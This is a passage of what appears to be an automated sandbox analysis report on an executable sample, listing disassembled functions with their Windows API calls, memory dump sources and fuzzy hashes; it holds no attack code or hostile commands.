                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 614568839-2785691316
                                          • Opcode ID: b42a7e126d594fe774e103495b45504c0fccda28c9ae7a06134cd3d9b5fb171a
                                          • Instruction ID: 7efb8c24e2c97cb7b04f166fdae6ef54f90bdab476d32a45d15506d1e6acc57f
                                          • Opcode Fuzzy Hash: b42a7e126d594fe774e103495b45504c0fccda28c9ae7a06134cd3d9b5fb171a
                                          • Instruction Fuzzy Hash: DD9127B1D002199FDF14DFA4D890EEEBBB8BF08314F10516AE915BB291DB315A45CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetMenu.USER32 ref: 00ED2183
                                          • GetMenuItemCount.USER32(00000000), ref: 00ED21B5
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00ED21DD
                                          • _wcslen.LIBCMT ref: 00ED2213
                                          • GetMenuItemID.USER32(?,?), ref: 00ED224D
                                          • GetSubMenu.USER32 ref: 00ED225B
                                            • Part of subcall function 00EA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA3A57
                                            • Part of subcall function 00EA3A3D: GetCurrentThreadId.KERNEL32 ref: 00EA3A5E
                                            • Part of subcall function 00EA3A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00EA3A65
                                          • PostMessageW.USER32 ref: 00ED22E3
                                            • Part of subcall function 00EAE97B: Sleep.KERNEL32 ref: 00EAE9F3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                          • String ID:
                                          • API String ID: 4196846111-0
                                          • Opcode ID: 107ef2100d209f2fef3b7232ceaaf20d7fe601f976f12f3f358f8b39fb33b704
                                          • Instruction ID: 0de30793a11257d6f62fff956cdd1e6efde87e5d80f42686aa8eac7ddb070936
                                          • Opcode Fuzzy Hash: 107ef2100d209f2fef3b7232ceaaf20d7fe601f976f12f3f358f8b39fb33b704
                                          • Instruction Fuzzy Hash: A8719D35A00205AFCB10DF64C841AAEB7F5EF98310F14945EEA26FB351DB35EE428B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: d3742b4b2d6e4adced2cae38e52fbe23e7872cc49037d31ba46e06b0cbc4ba06
                                          • Instruction ID: 64a21f1a8dd9cef2de80d49d4351d7782b9e8f8bbdde54ad4533e17f07b9ce19
                                          • Opcode Fuzzy Hash: d3742b4b2d6e4adced2cae38e52fbe23e7872cc49037d31ba46e06b0cbc4ba06
                                          • Instruction Fuzzy Hash: 2851A1A06047D57DFB364234CC45BBABEE95B0B308F0C959AE1E9694D3C398B8C8D761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: cd6c720ed9dbd346596bca661c55961ea46415057befb20c3c27c122e0934c1f
                                          • Instruction ID: 0bb846b9dcbcafe2b78f4a2e6e01b234125d7dd69c170b7bbffdad4ee7b587c0
                                          • Opcode Fuzzy Hash: cd6c720ed9dbd346596bca661c55961ea46415057befb20c3c27c122e0934c1f
                                          • Instruction Fuzzy Hash: C651B1A15047D53DFB3782248C55B7ABEE85B4B308F0CA499E1D56E8C2D394FC88E762
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: b1d2584cd52ba57a4b2f81552fd9a4ddb0389c3d9d7cd78d477568355f725ea2
                                          • Instruction ID: 08ea1f466b4951d206d57d74364a43a5c3d74fc5251e306170f658535b1c9d7d
                                          • Opcode Fuzzy Hash: b1d2584cd52ba57a4b2f81552fd9a4ddb0389c3d9d7cd78d477568355f725ea2
                                          • Instruction Fuzzy Hash: A951C371A006499FDB10CFA8D845AEEBBF9EF09300F14915AF959F7291E7709A41CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EC304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EC307A
                                            • Part of subcall function 00EC304E: _wcslen.LIBCMT ref: 00EC309B
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EC1112
                                          • WSAGetLastError.WSOCK32 ref: 00EC1121
                                          • WSAGetLastError.WSOCK32 ref: 00EC11C9
                                          • closesocket.WSOCK32(00000000), ref: 00EC11F9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 2675159561-0
                                          • Opcode ID: b3d58cc91b204d878eac776423f070a1d24fd37a0032fef4d6c23c93e09f3784
                                          • Instruction ID: c6ee3c473a1b174a36258815ca5a08abbf64193c667d71cf6c4ed9a0d421e5e8
                                          • Opcode Fuzzy Hash: b3d58cc91b204d878eac776423f070a1d24fd37a0032fef4d6c23c93e09f3784
                                          • Instruction Fuzzy Hash: 31412631201205AFDB109F24D944FA9B7E9EF42368F188099FD15BB282C779ED46CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EACF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EADDE0: GetFullPathNameW.KERNEL32 ref: 00EADDFD
                                            • Part of subcall function 00EADDE0: GetFullPathNameW.KERNEL32 ref: 00EADE16
                                          • lstrcmpiW.KERNEL32 ref: 00EACF45
                                          • MoveFileW.KERNEL32 ref: 00EACF7F
                                          • _wcslen.LIBCMT ref: 00EAD005
                                          • _wcslen.LIBCMT ref: 00EAD01B
                                          • SHFileOperationW.SHELL32(?), ref: 00EAD061
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 3164238972-1173974218
                                          • Opcode ID: 43f4a9803427c3664b6eb5cfb1c8234cdb01baa90abffc9ba1204462a19c1b0d
                                          • Instruction ID: bdb834b0035608c79aa57c4a8aff04b30b679d09253491f862cd5c4f839c9b27
                                          • Opcode Fuzzy Hash: 43f4a9803427c3664b6eb5cfb1c8234cdb01baa90abffc9ba1204462a19c1b0d
                                          • Instruction Fuzzy Hash: 854163759452199EDF12EBA4DD81ADEB7F9AF0D380F1010E6E505FF142EA34BA48CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00ED2E1C
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00ED2E4F
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00ED2E84
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00ED2EB6
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00ED2EE0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00ED2EF1
                                          • SetWindowLongW.USER32 ref: 00ED2F0B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: c1e0075132796b7b62d1594597beceb35ed3730008d737b31ed8f1b40e8913f8
                                          • Instruction ID: cffaae7062b80b5f2377fe1877905cc5de853d2bb572238bc47f7e64c5d4331e
                                          • Opcode Fuzzy Hash: c1e0075132796b7b62d1594597beceb35ed3730008d737b31ed8f1b40e8913f8
                                          • Instruction Fuzzy Hash: F53137306451459FEB22CF19DC84FA537E0FBAAB14F1551AAFA10AB2B1CB71E841EB01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EA7769
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EA778F
                                          • SysAllocString.OLEAUT32 ref: 00EA7792
                                          • SysAllocString.OLEAUT32 ref: 00EA77B0
                                          • SysFreeString.OLEAUT32(?), ref: 00EA77B9
                                          • StringFromGUID2.OLE32 ref: 00EA77DE
                                          • SysAllocString.OLEAUT32 ref: 00EA77EC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 482f9c2d9fd6a5e6815b22aa6479ffa8316d7707fc7b44b647ee5d215d666832
                                          • Instruction ID: 5381c3f32a7bfa77aa367c67d9c6589896e3728b2c8d3e7874a64ec91569e37d
                                          • Opcode Fuzzy Hash: 482f9c2d9fd6a5e6815b22aa6479ffa8316d7707fc7b44b647ee5d215d666832
                                          • Instruction Fuzzy Hash: BD21DE3660921AAFDB00DFA8DC88CFB33ECEB0A3A47108026FA54EB150D670EC45C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EA7842
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EA7868
                                          • SysAllocString.OLEAUT32 ref: 00EA786B
                                          • SysAllocString.OLEAUT32 ref: 00EA788C
                                          • SysFreeString.OLEAUT32 ref: 00EA7895
                                          • StringFromGUID2.OLE32 ref: 00EA78AF
                                          • SysAllocString.OLEAUT32 ref: 00EA78BD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 0fd3b34988382ce6de2d7089f51e45fe29c43ac60ec5126fc5ef90f86f013efa
                                          • Instruction ID: 8dee8932953ff464b1bf56c7147d45b52a0cab070113167c2947fcc016d2c439
                                          • Opcode Fuzzy Hash: 0fd3b34988382ce6de2d7089f51e45fe29c43ac60ec5126fc5ef90f86f013efa
                                          • Instruction Fuzzy Hash: 8721F131608215AFDB14DFA8DC88CAA77ECEF0E3607108125F910EF2A0DA78EC44CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateHandlePipe
                                          • String ID: nul
                                          • API String ID: 1424370930-2873401336
                                          • Opcode ID: 96d951cc77f723bc107fab92b26bf372136fa59dcf3d58d31a082d27d7671191
                                          • Instruction ID: 1f4911eb983a6fd0b481e5ae044077419c55709775b4006c441bf68bfe2921e0
                                          • Opcode Fuzzy Hash: 96d951cc77f723bc107fab92b26bf372136fa59dcf3d58d31a082d27d7671191
                                          • Instruction Fuzzy Hash: 24215CB5501306AFDB309F69DC44ADB77E4AF44768F204A19E9A1F62E0D770A944CF20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateHandlePipe
                                          • String ID: nul
                                          • API String ID: 1424370930-2873401336
                                          • Opcode ID: 34177229644d88f0d70f42d21cdbedfa568b42b61661ab9fa3876513ad2e1e94
                                          • Instruction ID: a39fd1d75259ba30cd029af6fe82df90c8fd69112c3ef0c30b0f284ffb6163f3
                                          • Opcode Fuzzy Hash: 34177229644d88f0d70f42d21cdbedfa568b42b61661ab9fa3876513ad2e1e94
                                          • Instruction Fuzzy Hash: B2217F755003069FDB209F699C04ADB77E4BF95764F201B19E9A1F72E4D770A860CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E4600E: CreateWindowExW.USER32 ref: 00E4604C
                                            • Part of subcall function 00E4600E: GetStockObject.GDI32 ref: 00E46060
                                            • Part of subcall function 00E4600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4606A
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00ED4112
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00ED411F
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00ED412A
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00ED4139
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00ED4145
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: a5bd4d371bd1cf06cb0e63985d166ef12192f33427c05433a47883f97ac5021f
                                          • Instruction ID: 2a944d1e6c4f87751a5925e6be0c4e2622ce37e05e1d9d857edb217d5ed187cf
                                          • Opcode Fuzzy Hash: a5bd4d371bd1cf06cb0e63985d166ef12192f33427c05433a47883f97ac5021f
                                          • Instruction Fuzzy Hash: F31193B2150219BFEF119E64CC85EE77FADEF18798F015111B718A2190C672DC21DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                          • Instruction ID: 011f3f40f8d44a1f048a904bc20134d84f79604b1242c55b2019989e3726f615
                                          • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                          • Instruction Fuzzy Hash: B7115E71544B04AAD625FFB4CC47FCBBBECAF80700F44982AF39DB6092DA65B5458760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(0110A3F0,0110A3F0), ref: 00EB097B
                                          • EnterCriticalSection.KERNEL32(0110A3D0,00000000), ref: 00EB098D
                                          • TerminateThread.KERNEL32 ref: 00EB099B
                                          • WaitForSingleObject.KERNEL32 ref: 00EB09A9
                                          • CloseHandle.KERNEL32(00000000), ref: 00EB09B8
                                          • InterlockedExchange.KERNEL32(0110A3F0,000001F6), ref: 00EB09C8
                                          • LeaveCriticalSection.KERNEL32(0110A3D0), ref: 00EB09CF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: 9218f37f30d8eb2c7ef6a692d95781085852642f6b3f28d6afffd525848183be
                                          • Instruction ID: 44d6566f0f21e971f22311cdcd547c165a7fb50712dd13f3a6515fb0fca00771
                                          • Opcode Fuzzy Hash: 9218f37f30d8eb2c7ef6a692d95781085852642f6b3f28d6afffd525848183be
                                          • Instruction Fuzzy Hash: FEF01D31483913AFD7515B95EE88BD67B35FF41742F502116F101B08B1C774A469CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E701B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                          Download Yara Rule
                                          APIs
                                          • __allrem.LIBCMT ref: 00E700BA
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E700D6
                                          • __allrem.LIBCMT ref: 00E700ED
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E7010B
                                          • __allrem.LIBCMT ref: 00E70122
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E70140
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
